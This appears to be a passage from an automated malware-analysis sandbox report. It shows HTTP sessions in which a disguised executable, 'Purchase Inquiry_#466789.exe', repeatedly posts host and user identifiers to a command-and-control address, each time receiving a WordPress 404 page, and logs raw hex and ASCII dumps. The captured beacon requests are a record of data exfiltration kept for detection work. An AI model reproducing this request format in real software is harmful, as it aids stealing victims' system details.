                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:33:30.432019949 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:33:30.432066917 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:33:30.432113886 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:33:30.432158947 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                  Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                  May 27, 2024 08:33:30.432204962 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                  Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                  May 27, 2024 08:33:30.432250023 CEST1236INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                  Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
                  May 27, 2024 08:33:30.432296991 CEST1236INData Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                  Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
                  May 27, 2024 08:33:30.432346106 CEST1236INData Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                  Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  33192.168.2.44977745.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:30.592636108 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:30.597626925 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:32.708559036 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:31 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:32.708619118 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                  May 27, 2024 08:33:32.708650112 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                  Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                  May 27, 2024 08:33:32.708683968 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                  Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                  May 27, 2024 08:33:32.708791018 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                  Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                  May 27, 2024 08:33:32.708825111 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                  Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                  May 27, 2024 08:33:32.708863974 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:33:32.708898067 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:33:32.708935022 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:33:32.708970070 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  34192.168.2.44977845.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:32.904351950 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:32.909456015 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:35.010194063 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:33 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:35.010226011 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:33:35.010305882 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:33:35.010322094 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:33:35.010338068 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:33:35.010354042 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                  Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                  May 27, 2024 08:33:35.010370016 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                  Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                  May 27, 2024 08:33:35.010385990 CEST1236INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                  Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
                  May 27, 2024 08:33:35.010401964 CEST1236INData Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                  Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
                  May 27, 2024 08:33:35.010417938 CEST556INData Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                  Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  35192.168.2.44977945.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:35.317851067 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:35.323153973 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:37.469744921 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:35 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
